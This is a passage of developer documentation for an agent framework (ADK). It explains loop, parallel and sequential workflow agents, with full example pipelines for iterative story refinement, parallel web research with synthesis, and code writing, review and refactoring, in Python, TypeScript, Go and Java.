refinementLoop}, }, }) if err != nil { return fmt.Errorf("failed to create sequential agent pipeline: %v", err) } ``` ````java import static com.google.adk.agents.LlmAgent.IncludeContents.NONE; import com.google.adk.agents.LlmAgent; import com.google.adk.agents.LoopAgent; import com.google.adk.agents.SequentialAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.FunctionTool; import com.google.adk.tools.ToolContext; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import java.util.Map; public class LoopAgentExample { // --- Constants --- private static final String APP_NAME = "IterativeWritingPipeline"; private static final String USER_ID = "test_user_456"; private static final String MODEL_NAME = "gemini-2.0-flash"; // --- State Keys --- private static final String STATE_CURRENT_DOC = "current_document"; private static final String STATE_CRITICISM = "criticism"; public static void main(String[] args) { LoopAgentExample loopAgentExample = new LoopAgentExample(); loopAgentExample.runAgent("Write a document about a cat"); } // --- Tool Definition --- @Schema( description = "Call this function ONLY when the critique indicates no further changes are needed," + " signaling the iterative process should end.") public static Map exitLoop(@Schema(name = "toolContext") ToolContext toolContext) { System.out.printf("[Tool Call] exitLoop triggered by %s \n", toolContext.agentName()); toolContext.actions().setEscalate(true); // Return empty dict as tools should typically return JSON-serializable output return Map.of(); } // --- Agent Definitions --- public void runAgent(String prompt) { // STEP 1: Initial Writer Agent (Runs ONCE at the beginning) LlmAgent initialWriterAgent = LlmAgent.builder() .model(MODEL_NAME) .name("InitialWriterAgent") .description( "Writes the initial document draft based on the topic, aiming for some initial" + " substance.") .instruction( """ You are a Creative Writing Assistant tasked with starting a story. Write the *first draft* of a short story (aim for 2-4 sentences). Base the content *only* on the topic provided below. Try to introduce a specific element (like a character, a setting detail, or a starting action) to make it engaging. Output *only* the story/document text. Do not add introductions or explanations. """) .outputKey(STATE_CURRENT_DOC) .includeContents(NONE) .build(); // STEP 2a: Critic Agent (Inside the Refinement Loop) LlmAgent criticAgentInLoop = LlmAgent.builder() .model(MODEL_NAME) .name("CriticAgent") .description( "Reviews the current draft, providing critique if clear improvements are needed," + " otherwise signals completion.") .instruction( """ You are a Constructive Critic AI reviewing a short document draft (typically 2-6 sentences). Your goal is balanced feedback. **Document to Review:** ``` {{current_document}} ``` **Task:** Review the document for clarity, engagement, and basic coherence according to the initial topic (if known). IF you identify 1-2 *clear and actionable* ways the document could be improved to better capture the topic or enhance reader engagement (e.g., "Needs a stronger opening sentence", "Clarify the character's goal"): Provide these specific suggestions concisely. Output *only* the critique text. ELSE IF the document is coherent, addresses the topic adequately for its length, and has no glaring errors or obvious omissions: Respond *exactly* with the phrase "No major issues found." and nothing else. It doesn't need to be perfect, just functionally complete for this stage. Avoid suggesting purely subjective stylistic preferences if the core is sound. Do not add explanations. Output only the critique OR the exact completion phrase. """) .outputKey(STATE_CRITICISM) .includeContents(NONE) .build(); // STEP 2b: Refiner/Exiter Agent (Inside the Refinement Loop) LlmAgent refinerAgentInLoop = LlmAgent.builder() .model(MODEL_NAME) .name("RefinerAgent") .description( "Refines the document based on critique, or calls exitLoop if critique indicates" + " completion.") .instruction( """ You are a Creative Writing Assistant refining a document based on feedback OR exiting the process. **Current Document:** ``` {{current_document}} ``` **Critique/Suggestions:** {{criticism}} **Task:** Analyze the 'Critique/Suggestions'. IF the critique is *exactly* "No major issues found.": You MUST call the 'exitLoop' function. Do not output any text. ELSE (the critique contains actionable feedback): Carefully apply the suggestions to improve the 'Current Document'. Output *only* the refined document text. Do not add explanations. Either output the refined document OR call the exitLoop function. """) .outputKey(STATE_CURRENT_DOC) .includeContents(NONE) .tools(FunctionTool.create(LoopAgentExample.class, "exitLoop")) .build(); // STEP 2: Refinement Loop Agent LoopAgent refinementLoop = LoopAgent.builder() .name("RefinementLoop") .description("Repeatedly refines the document with critique and then exits.") .subAgents(criticAgentInLoop, refinerAgentInLoop) .maxIterations(5) .build(); // STEP 3: Overall Sequential Pipeline SequentialAgent iterativeWriterAgent = SequentialAgent.builder() .name(APP_NAME) .description( "Writes an initial document and then iteratively refines it with critique using an" + " exit tool.") .subAgents(initialWriterAgent, refinementLoop) .build(); // Create an InMemoryRunner InMemoryRunner runner = new InMemoryRunner(iterativeWriterAgent, APP_NAME); // InMemoryRunner automatically creates a session service. Create a session using the service Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet(); Content userMessage = Content.fromParts(Part.fromText(prompt)); // Run the agent Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } ```` # Parallel agents Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.2.0 The `ParallelAgent` is a [workflow agent](https://google.github.io/adk-docs/agents/workflow-agents/index.md) that executes its sub-agents *concurrently*. This dramatically speeds up workflows where tasks can be performed independently. Use `ParallelAgent` when: For scenarios prioritizing speed and involving independent, resource-intensive tasks, a `ParallelAgent` facilitates efficient parallel execution. **When sub-agents operate without dependencies, their tasks can be performed concurrently**, significantly reducing overall processing time. As with other [workflow agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md), the `ParallelAgent` is not powered by an LLM, and is thus deterministic in how it executes. That being said, workflow agents are only concerned with their execution (i.e. executing sub-agents in parallel), and not their internal logic; the tools or sub-agents of a workflow agent may or may not utilize LLMs. ### Example This approach is particularly beneficial for operations like multi-source data retrieval or heavy computations, where parallelization yields substantial performance gains. Importantly, this strategy assumes no inherent need for shared state or direct information exchange between the concurrently executing agents. ### How it works When the `ParallelAgent`'s `run_async()` method is called: 1. **Concurrent Execution:** It initiates the `run_async()` method of *each* sub-agent present in the `sub_agents` list *concurrently*. This means all the agents start running at (approximately) the same time. 1. **Independent Branches:** Each sub-agent operates in its own execution branch. There is ***no* automatic sharing of conversation history or state between these branches** during execution. 1. **Result Collection:** The `ParallelAgent` manages the parallel execution and, typically, provides a way to access the results from each sub-agent after they have completed (e.g., through a list of results or events). The order of results may not be deterministic. ### Independent Execution and State Management It's *crucial* to understand that sub-agents within a `ParallelAgent` run independently. If you *need* communication or data sharing between these agents, you must implement it explicitly. Possible approaches include: - **Shared `InvocationContext`:** You could pass a shared `InvocationContext` object to each sub-agent. This object could act as a shared data store. However, you'd need to manage concurrent access to this shared context carefully (e.g., using locks) to avoid race conditions. - **External State Management:** Use an external database, message queue, or other mechanism to manage shared state and facilitate communication between agents. - **Post-Processing:** Collect results from each branch, and then implement logic to coordinate data afterwards. ### Full Example: Parallel Web Research Imagine researching multiple topics simultaneously: 1. **Researcher Agent 1:** An `LlmAgent` that researches "renewable energy sources." 1. **Researcher Agent 2:** An `LlmAgent` that researches "electric vehicle technology." 1. **Researcher Agent 3:** An `LlmAgent` that researches "carbon capture methods." ```py ParallelAgent(sub_agents=[ResearcherAgent1, ResearcherAgent2, ResearcherAgent3]) ``` These research tasks are independent. Using a `ParallelAgent` allows them to run concurrently, potentially reducing the total research time significantly compared to running them sequentially. The results from each agent would be collected separately after they finish. Full Code ```py from google.adk.agents.parallel_agent import ParallelAgent from google.adk.agents.llm_agent import LlmAgent from google.adk.agents.sequential_agent import SequentialAgent from google.adk.tools import google_search # --- Constants --- GEMINI_MODEL = "gemini-2.5-flash" # --- 1. Define Researcher Sub-Agents (to run in parallel) --- # Researcher 1: Renewable Energy researcher_agent_1 = LlmAgent( name="RenewableEnergyResearcher", model=GEMINI_MODEL, instruction=""" You are an AI Research Assistant specializing in energy. Research the latest advancements in 'renewable energy sources'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. """, description="Researches renewable energy sources.", tools=[google_search], # Store result in state for the merger agent output_key="renewable_energy_result" ) # Researcher 2: Electric Vehicles researcher_agent_2 = LlmAgent( name="EVResearcher", model=GEMINI_MODEL, instruction=""" You are an AI Research Assistant specializing in transportation. Research the latest developments in 'electric vehicle technology'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. """, description="Researches electric vehicle technology.", tools=[google_search], # Store result in state for the merger agent output_key="ev_technology_result" ) # Researcher 3: Carbon Capture researcher_agent_3 = LlmAgent( name="CarbonCaptureResearcher", model=GEMINI_MODEL, instruction=""" You are an AI Research Assistant specializing in climate solutions. Research the current state of 'carbon capture methods'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. """, description="Researches carbon capture methods.", tools=[google_search], # Store result in state for the merger agent output_key="carbon_capture_result" ) # --- 2. Create the ParallelAgent (Runs researchers concurrently) --- # This agent orchestrates the concurrent execution of the researchers. # It finishes once all researchers have completed and stored their results in state. parallel_research_agent = ParallelAgent( name="ParallelWebResearchAgent", sub_agents=[researcher_agent_1, researcher_agent_2, researcher_agent_3], description="Runs multiple research agents in parallel to gather information." ) # --- 3. Define the Merger Agent (Runs *after* the parallel agents) --- # This agent takes the results stored in the session state by the parallel agents # and synthesizes them into a single, structured response with attributions. merger_agent = LlmAgent( name="SynthesisAgent", model=GEMINI_MODEL, # Or potentially a more powerful model if needed for synthesis instruction=""" You are an AI Assistant responsible for combining research findings into a structured report. Your primary task is to synthesize the following research summaries, clearly attributing findings to their source areas. Structure your response using headings for each topic. Ensure the report is coherent and integrates the key points smoothly. **Crucially: Your entire response MUST be grounded *exclusively* on the information provided in the 'Input Summaries' below. Do NOT add any external knowledge, facts, or details not present in these specific summaries.** **Input Summaries:** * **Renewable Energy:** {renewable_energy_result} * **Electric Vehicles:** {ev_technology_result} * **Carbon Capture:** {carbon_capture_result} **Output Format:** ## Summary of Recent Sustainable Technology Advancements ### Renewable Energy Findings (Based on RenewableEnergyResearcher's findings) [Synthesize and elaborate *only* on the renewable energy input summary provided above.] ### Electric Vehicle Findings (Based on EVResearcher's findings) [Synthesize and elaborate *only* on the EV input summary provided above.] ### Carbon Capture Findings (Based on CarbonCaptureResearcher's findings) [Synthesize and elaborate *only* on the carbon capture input summary provided above.] ### Overall Conclusion [Provide a brief (1-2 sentence) concluding statement that connects *only* the findings presented above.] Output *only* the structured report following this format. Do not include introductory or concluding phrases outside this structure, and strictly adhere to using only the provided input summary content. """, description="Combines research findings from parallel agents into a structured, cited report, strictly grounded on provided inputs.", # No tools needed for merging # No output_key needed here, as its direct response is the final output of the sequence ) # --- 4. Create the SequentialAgent (Orchestrates the overall flow) --- # This is the main agent that will be run. It first executes the ParallelAgent # to populate the state, and then executes the MergerAgent to produce the final output. sequential_pipeline_agent = SequentialAgent( name="ResearchAndSynthesisPipeline", # Run parallel research first, then merge sub_agents=[parallel_research_agent, merger_agent], description="Coordinates parallel research and synthesizes the results." ) root_agent = sequential_pipeline_agent ``` ```typescript // Part of agent.ts --> Follow https://google.github.io/adk-docs/get-started/quickstart/ to learn the setup // --- 1. Define Researcher Sub-Agents (to run in parallel) --- const researchTools = [GOOGLE_SEARCH]; // Researcher 1: Renewable Energy const researcherAgent1 = new LlmAgent({ name: "RenewableEnergyResearcher", model: GEMINI_MODEL, instruction: `You are an AI Research Assistant specializing in energy. Research the latest advancements in 'renewable energy sources'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. `, description: "Researches renewable energy sources.", tools: researchTools, // Store result in state for the merger agent outputKey: "renewable_energy_result" }); // Researcher 2: Electric Vehicles const researcherAgent2 = new LlmAgent({ name: "EVResearcher", model: GEMINI_MODEL, instruction: `You are an AI Research Assistant specializing in transportation. Research the latest developments in 'electric vehicle technology'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. `, description: "Researches electric vehicle technology.", tools: researchTools, // Store result in state for the merger agent outputKey: "ev_technology_result" }); // Researcher 3: Carbon Capture const researcherAgent3 = new LlmAgent({ name: "CarbonCaptureResearcher", model: GEMINI_MODEL, instruction: `You are an AI Research Assistant specializing in climate solutions. Research the current state of 'carbon capture methods'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. `, description: "Researches carbon capture methods.", tools: researchTools, // Store result in state for the merger agent outputKey: "carbon_capture_result" }); // --- 2. Create the ParallelAgent (Runs researchers concurrently) --- // This agent orchestrates the concurrent execution of the researchers. // It finishes once all researchers have completed and stored their results in state. const parallelResearchAgent = new ParallelAgent({ name: "ParallelWebResearchAgent", subAgents: [researcherAgent1, researcherAgent2, researcherAgent3], description: "Runs multiple research agents in parallel to gather information." }); // --- 3. Define the Merger Agent (Runs *after* the parallel agents) --- // This agent takes the results stored in the session state by the parallel agents // and synthesizes them into a single, structured response with attributions. const mergerAgent = new LlmAgent({ name: "SynthesisAgent", model: GEMINI_MODEL, // Or potentially a more powerful model if needed for synthesis instruction: `You are an AI Assistant responsible for combining research findings into a structured report. Your primary task is to synthesize the following research summaries, clearly attributing findings to their source areas. Structure your response using headings for each topic. Ensure the report is coherent and integrates the key points smoothly. **Crucially: Your entire response MUST be grounded *exclusively* on the information provided in the 'Input Summaries' below. Do NOT add any external knowledge, facts, or details not present in these specific summaries.** **Input Summaries:** * **Renewable Energy:** {renewable_energy_result} * **Electric Vehicles:** {ev_technology_result} * **Carbon Capture:** {carbon_capture_result} **Output Format:** ## Summary of Recent Sustainable Technology Advancements ### Renewable Energy Findings (Based on RenewableEnergyResearcher's findings) [Synthesize and elaborate *only* on the renewable energy input summary provided above.] ### Electric Vehicle Findings (Based on EVResearcher's findings) [Synthesize and elaborate *only* on the EV input summary provided above.] ### Carbon Capture Findings (Based on CarbonCaptureResearcher's findings) [Synthesize and elaborate *only* on the carbon capture input summary provided above.] ### Overall Conclusion [Provide a brief (1-2 sentence) concluding statement that connects *only* the findings presented above.] Output *only* the structured report following this format. Do not include introductory or concluding phrases outside this structure, and strictly adhere to using only the provided input summary content. `, description: "Combines research findings from parallel agents into a structured, cited report, strictly grounded on provided inputs.", // No tools needed for merging // No output_key needed here, as its direct response is the final output of the sequence }); // --- 4. Create the SequentialAgent (Orchestrates the overall flow) --- // This is the main agent that will be run. It first executes the ParallelAgent // to populate the state, and then executes the MergerAgent to produce the final output. const rootAgent = new SequentialAgent({ name: "ResearchAndSynthesisPipeline", // Run parallel research first, then merge subAgents: [parallelResearchAgent, mergerAgent], description: "Coordinates parallel research and synthesizes the results." }); ``` ```go model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { return fmt.Errorf("failed to create model: %v", err) } // --- 1. Define Researcher Sub-Agents (to run in parallel) --- researcher1, err := llmagent.New(llmagent.Config{ Name: "RenewableEnergyResearcher", Model: model, Instruction: `You are an AI Research Assistant specializing in energy. Research the latest advancements in 'renewable energy sources'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary.`, Description: "Researches renewable energy sources.", OutputKey: "renewable_energy_result", }) if err != nil { return err } researcher2, err := llmagent.New(llmagent.Config{ Name: "EVResearcher", Model: model, Instruction: `You are an AI Research Assistant specializing in transportation. Research the latest developments in 'electric vehicle technology'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary.`, Description: "Researches electric vehicle technology.", OutputKey: "ev_technology_result", }) if err != nil { return err } researcher3, err := llmagent.New(llmagent.Config{ Name: "CarbonCaptureResearcher", Model: model, Instruction: `You are an AI Research Assistant specializing in climate solutions. Research the current state of 'carbon capture methods'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary.`, Description: "Researches carbon capture methods.", OutputKey: "carbon_capture_result", }) if err != nil { return err } // --- 2. Create the ParallelAgent (Runs researchers concurrently) --- parallelResearchAgent, err := parallelagent.New(parallelagent.Config{ AgentConfig: agent.Config{ Name: "ParallelWebResearchAgent", Description: "Runs multiple research agents in parallel to gather information.", SubAgents: []agent.Agent{researcher1, researcher2, researcher3}, }, }) if err != nil { return fmt.Errorf("failed to create parallel agent: %v", err) } // --- 3. Define the Merger Agent (Runs *after* the parallel agents) --- synthesisAgent, err := llmagent.New(llmagent.Config{ Name: "SynthesisAgent", Model: model, Instruction: `You are an AI Assistant responsible for combining research findings into a structured report. Your primary task is to synthesize the following research summaries, clearly attributing findings to their source areas. Structure your response using headings for each topic. Ensure the report is coherent and integrates the key points smoothly. **Crucially: Your entire response MUST be grounded *exclusively* on the information provided in the 'Input Summaries' below. Do NOT add any external knowledge, facts, or details not present in these specific summaries.** **Input Summaries:** * **Renewable Energy:** {renewable_energy_result} * **Electric Vehicles:** {ev_technology_result} * **Carbon Capture:** {carbon_capture_result} **Output Format:** ## Summary of Recent Sustainable Technology Advancements ### Renewable Energy Findings (Based on RenewableEnergyResearcher's findings) [Synthesize and elaborate *only* on the renewable energy input summary provided above.] ### Electric Vehicle Findings (Based on EVResearcher's findings) [Synthesize and elaborate *only* on the EV input summary provided above.] ### Carbon Capture Findings (Based on CarbonCaptureResearcher's findings) [Synthesize and elaborate *only* on the carbon capture input summary provided above.] ### Overall Conclusion [Provide a brief (1-2 sentence) concluding statement that connects *only* the findings presented above.] Output *only* the structured report following this format. Do not include introductory or concluding phrases outside this structure, and strictly adhere to using only the provided input summary content.`, Description: "Combines research findings from parallel agents into a structured, cited report, strictly grounded on provided inputs.", }) if err != nil { return fmt.Errorf("failed to create synthesis agent: %v", err) } // --- 4. Create the SequentialAgent (Orchestrates the overall flow) --- pipeline, err := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{ Name: "ResearchAndSynthesisPipeline", Description: "Coordinates parallel research and synthesizes the results.", SubAgents: []agent.Agent{parallelResearchAgent, synthesisAgent}, }, }) if err != nil { return fmt.Errorf("failed to create sequential agent pipeline: %v", err) } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.ParallelAgent; import com.google.adk.agents.SequentialAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.tools.GoogleSearchTool; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; public class ParallelResearchPipeline { private static final String APP_NAME = "parallel_research_app"; private static final String USER_ID = "research_user_01"; private static final String GEMINI_MODEL = "gemini-2.0-flash"; // Assume google_search is an instance of the GoogleSearchTool private static final GoogleSearchTool googleSearchTool = new GoogleSearchTool(); public static void main(String[] args) { String query = "Summarize recent sustainable tech advancements."; SequentialAgent sequentialPipelineAgent = initAgent(); runAgent(sequentialPipelineAgent, query); } public static SequentialAgent initAgent() { // --- 1. Define Researcher Sub-Agents (to run in parallel) --- // Researcher 1: Renewable Energy LlmAgent researcherAgent1 = LlmAgent.builder() .name("RenewableEnergyResearcher") .model(GEMINI_MODEL) .instruction(""" You are an AI Research Assistant specializing in energy. Research the latest advancements in 'renewable energy sources'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. """) .description("Researches renewable energy sources.") .tools(googleSearchTool) .outputKey("renewable_energy_result") // Store result in state .build(); // Researcher 2: Electric Vehicles LlmAgent researcherAgent2 = LlmAgent.builder() .name("EVResearcher") .model(GEMINI_MODEL) .instruction(""" You are an AI Research Assistant specializing in transportation. Research the latest developments in 'electric vehicle technology'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. """) .description("Researches electric vehicle technology.") .tools(googleSearchTool) .outputKey("ev_technology_result") // Store result in state .build(); // Researcher 3: Carbon Capture LlmAgent researcherAgent3 = LlmAgent.builder() .name("CarbonCaptureResearcher") .model(GEMINI_MODEL) .instruction(""" You are an AI Research Assistant specializing in climate solutions. Research the current state of 'carbon capture methods'. Use the Google Search tool provided. Summarize your key findings concisely (1-2 sentences). Output *only* the summary. """) .description("Researches carbon capture methods.") .tools(googleSearchTool) .outputKey("carbon_capture_result") // Store result in state .build(); // --- 2. Create the ParallelAgent (Runs researchers concurrently) --- // This agent orchestrates the concurrent execution of the researchers. // It finishes once all researchers have completed and stored their results in state. ParallelAgent parallelResearchAgent = ParallelAgent.builder() .name("ParallelWebResearchAgent") .subAgents(researcherAgent1, researcherAgent2, researcherAgent3) .description("Runs multiple research agents in parallel to gather information.") .build(); // --- 3. Define the Merger Agent (Runs *after* the parallel agents) --- // This agent takes the results stored in the session state by the parallel agents // and synthesizes them into a single, structured response with attributions. LlmAgent mergerAgent = LlmAgent.builder() .name("SynthesisAgent") .model(GEMINI_MODEL) .instruction( """ You are an AI Assistant responsible for combining research findings into a structured report. Your primary task is to synthesize the following research summaries, clearly attributing findings to their source areas. Structure your response using headings for each topic. Ensure the report is coherent and integrates the key points smoothly. **Crucially: Your entire response MUST be grounded *exclusively* on the information provided in the 'Input Summaries' below. Do NOT add any external knowledge, facts, or details not present in these specific summaries.** **Input Summaries:** * **Renewable Energy:** {renewable_energy_result} * **Electric Vehicles:** {ev_technology_result} * **Carbon Capture:** {carbon_capture_result} **Output Format:** ## Summary of Recent Sustainable Technology Advancements ### Renewable Energy Findings (Based on RenewableEnergyResearcher's findings) [Synthesize and elaborate *only* on the renewable energy input summary provided above.] ### Electric Vehicle Findings (Based on EVResearcher's findings) [Synthesize and elaborate *only* on the EV input summary provided above.] ### Carbon Capture Findings (Based on CarbonCaptureResearcher's findings) [Synthesize and elaborate *only* on the carbon capture input summary provided above.] ### Overall Conclusion [Provide a brief (1-2 sentence) concluding statement that connects *only* the findings presented above.] Output *only* the structured report following this format. Do not include introductory or concluding phrases outside this structure, and strictly adhere to using only the provided input summary content. """) .description( "Combines research findings from parallel agents into a structured, cited report, strictly grounded on provided inputs.") // No tools needed for merging // No output_key needed here, as its direct response is the final output of the sequence .build(); // --- 4. Create the SequentialAgent (Orchestrates the overall flow) --- // This is the main agent that will be run. It first executes the ParallelAgent // to populate the state, and then executes the MergerAgent to produce the final output. SequentialAgent sequentialPipelineAgent = SequentialAgent.builder() .name("ResearchAndSynthesisPipeline") // Run parallel research first, then merge .subAgents(parallelResearchAgent, mergerAgent) .description("Coordinates parallel research and synthesizes the results.") .build(); return sequentialPipelineAgent; } public static void runAgent(SequentialAgent sequentialPipelineAgent, String query) { // Create an InMemoryRunner InMemoryRunner runner = new InMemoryRunner(sequentialPipelineAgent, APP_NAME); // InMemoryRunner automatically creates a session service. Create a session using the service Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet(); Content userMessage = Content.fromParts(Part.fromText(query)); // Run the agent Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.printf("Event Author: %s \n Event Response: %s \n\n\n", event.author(), event.stringifyContent()); } }); } } ``` # Sequential agents Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.2.0 The `SequentialAgent` is a [workflow agent](https://google.github.io/adk-docs/agents/workflow-agents/index.md) that executes its sub-agents in the order they are specified in the list. Use the `SequentialAgent` when you want the execution to occur in a fixed, strict order. ### Example - You want to build an agent that can summarize any webpage, using two tools: `Get Page Contents` and `Summarize Page`. Because the agent must always call `Get Page Contents` before calling `Summarize Page` (you can't summarize from nothing!), you should build your agent using a `SequentialAgent`. As with other [workflow agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md), the `SequentialAgent` is not powered by an LLM, and is thus deterministic in how it executes. That being said, workflow agents are concerned only with their execution (i.e. in sequence), and not their internal logic; the tools or sub-agents of a workflow agent may or may not utilize LLMs. ### How it works When the `SequentialAgent`'s `Run Async` method is called, it performs the following actions: 1. **Iteration:** It iterates through the sub agents list in the order they were provided. 1. **Sub-Agent Execution:** For each sub-agent in the list, it calls the sub-agent's `Run Async` method. ### Full Example: Code Development Pipeline Consider a simplified code development pipeline: - **Code Writer Agent:** An LLM Agent that generates initial code based on a specification. - **Code Reviewer Agent:** An LLM Agent that reviews the generated code for errors, style issues, and adherence to best practices. It receives the output of the Code Writer Agent. - **Code Refactorer Agent:** An LLM Agent that takes the reviewed code (and the reviewer's comments) and refactors it to improve quality and address issues. A `SequentialAgent` is perfect for this: ```py SequentialAgent(sub_agents=[CodeWriterAgent, CodeReviewerAgent, CodeRefactorerAgent]) ``` This ensures the code is written, *then* reviewed, and *finally* refactored, in a strict, dependable order. **The output from each sub-agent is passed to the next by storing them in state via [Output Key](https://google.github.io/adk-docs/agents/llm-agents/#structuring-data-input_schema-output_schema-output_key)**. Shared Invocation Context The `SequentialAgent` passes the same `InvocationContext` to each of its sub-agents. This means they all share the same session state, including the temporary (`temp:`) namespace, making it easy to pass data between steps within a single turn. Code ````py from google.adk.agents.sequential_agent import SequentialAgent from google.adk.agents.llm_agent import LlmAgent # --- Constants --- GEMINI_MODEL = "gemini-2.5-flash" # --- 1. Define Sub-Agents for Each Pipeline Stage --- # Code Writer Agent # Takes the initial specification (from user query) and writes code. code_writer_agent = LlmAgent( name="CodeWriterAgent", model=GEMINI_MODEL, instruction=""" You are a Python Code Generator. Based *only* on the user's request, write Python code that fulfills the requirement. Output *only* the complete Python code block, enclosed in triple backticks (```python ... ```). Do not add any other text before or after the code block. """, description="Writes initial Python code based on a specification.", output_key="generated_code" ) # Code Reviewer Agent # Takes the code generated by the previous agent (read from state) and provides feedback. code_reviewer_agent = LlmAgent( name="CodeReviewerAgent", model=GEMINI_MODEL, instruction=""" You are an expert Python Code Reviewer. Your task is to provide constructive feedback on the provided code. **Code to Review:** ```python {generated_code} ``` **Review Criteria:** 1. **Correctness:** Does the code work as intended? Are there logic errors? 2. **Readability:** Is the code clear and easy to understand? Follows PEP 8 style guidelines? 3. **Efficiency:** Is the code reasonably efficient? Any obvious performance bottlenecks? 4. **Edge Cases:** Does the code handle potential edge cases or invalid inputs gracefully? 5. **Best Practices:** Does the code follow common Python best practices? **Output:** Provide your feedback as a concise, bulleted list. Focus on the most important points for improvement. If the code is excellent and requires no changes, simply state: "No major issues found." Output *only* the review comments or the "No major issues" statement. """, description="Reviews code and provides feedback.", output_key="review_comments" ) # Code Refactorer Agent # Takes the original code and the review comments (read from state) and refactors the code. code_refactorer_agent = LlmAgent( name="CodeRefactorerAgent", model=GEMINI_MODEL, instruction=""" You are a Python Code Refactoring AI. Your goal is to improve the given Python code based on the provided review comments. **Original Code:** ```python {generated_code} ``` **Review Comments:** {review_comments} **Task:** Carefully apply the suggestions from the review comments to refactor the original code. If the review comments state "No major issues found," return the original code unchanged. Ensure the final code is complete, functional, and includes necessary imports and docstrings. **Output:** Output *only* the final, refactored Python code block, enclosed in triple backticks (```python ... ```). Do not add any other text before or after the code block. """, description="Refactors code based on review comments.", output_key="refactored_code" ) # --- 2. Create the SequentialAgent --- # This agent orchestrates the pipeline by running the sub_agents in order. code_pipeline_agent = SequentialAgent( name="CodePipelineAgent", sub_agents=[code_writer_agent, code_reviewer_agent, code_refactorer_agent], description="Executes a sequence of code writing, reviewing, and refactoring.", ) root_agent = code_pipeline_agent ```` ```typescript // Part of agent.ts --> Follow https://google.github.io/adk-docs/get-started/quickstart/ to learn the setup // --- 1. Define Sub-Agents for Each Pipeline Stage --- // Code Writer Agent // Takes the initial specification (from user query) and writes code. const codeWriterAgent = new LlmAgent({ name: "CodeWriterAgent", model: GEMINI_MODEL, instruction: `You are a Python Code Generator. Based *only* on the user's request, write Python code that fulfills the requirement. Output *only* the complete Python code block, enclosed in triple backticks (\`\`\`python ... \`\`\`). Do not add any other text before or after the code block. `, description: "Writes initial Python code based on a specification.", outputKey: "generated_code" // Stores output in state['generated_code'] }); // Code Reviewer Agent // Takes the code generated by the previous agent (read from state) and provides feedback. const codeReviewerAgent = new LlmAgent({ name: "CodeReviewerAgent", model: GEMINI_MODEL, instruction: `You are an expert Python Code Reviewer. Your task is to provide constructive feedback on the provided code. **Code to Review:** \`\`\`python {generated_code} \`\`\` **Review Criteria:** 1. **Correctness:** Does the code work as intended? Are there logic errors? 2. **Readability:** Is the code clear and easy to understand? Follows PEP 8 style guidelines? 3. **Efficiency:** Is the code reasonably efficient? Any obvious performance bottlenecks? 4. **Edge Cases:** Does the code handle potential edge cases or invalid inputs gracefully? 5. **Best Practices:** Does the code follow common Python best practices? **Output:** Provide your feedback as a concise, bulleted list. Focus on the most important points for improvement. If the code is excellent and requires no changes, simply state: "No major issues found." Output *only* the review comments or the "No major issues" statement. `, description: "Reviews code and provides feedback.", outputKey: "review_comments", // Stores output in state['review_comments'] }); // Code Refactorer Agent // Takes the original code and the review comments (read from state) and refactors the code. const codeRefactorerAgent = new LlmAgent({ name: "CodeRefactorerAgent", model: GEMINI_MODEL, instruction: `You are a Python Code Refactoring AI. Your goal is to improve the given Python code based on the provided review comments. **Original Code:** \`\`\`python {generated_code} \`\`\` **Review Comments:** {review_comments} **Task:** Carefully apply the suggestions from the review comments to refactor the original code. If the review comments state "No major issues found," return the original code unchanged. Ensure the final code is complete, functional, and includes necessary imports and docstrings. **Output:** Output *only* the final, refactored Python code block, enclosed in triple backticks (\`\`\`python ... \`\`\`). Do not add any other text before or after the code block. `, description: "Refactors code based on review comments.", outputKey: "refactored_code", // Stores output in state['refactored_code'] }); // --- 2. Create the SequentialAgent --- // This agent orchestrates the pipeline by running the sub_agents in order. const rootAgent = new SequentialAgent({ name: "CodePipelineAgent", subAgents: [codeWriterAgent, codeReviewerAgent, codeRefactorerAgent], description: "Executes a sequence of code writing, reviewing, and refactoring.", // The agents will run in the order provided: Writer -> Reviewer -> Refactorer }); ``` ```go model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { return fmt.Errorf("failed to create model: %v", err) } codeWriterAgent, err := llmagent.New(llmagent.Config{ Name: "CodeWriterAgent", Model: model, Description: "Writes initial Go code based on a specification.", Instruction: `You are a Go Code Generator. Based *only* on the user's request, write Go code that fulfills the requirement. Output *only* the complete Go code block, enclosed in triple backticks ('''go ... '''). Do not add any other text before or after the code block.`, OutputKey: "generated_code", }) if err != nil { return fmt.Errorf("failed to create code writer agent: %v", err) } codeReviewerAgent, err := llmagent.New(llmagent.Config{ Name: 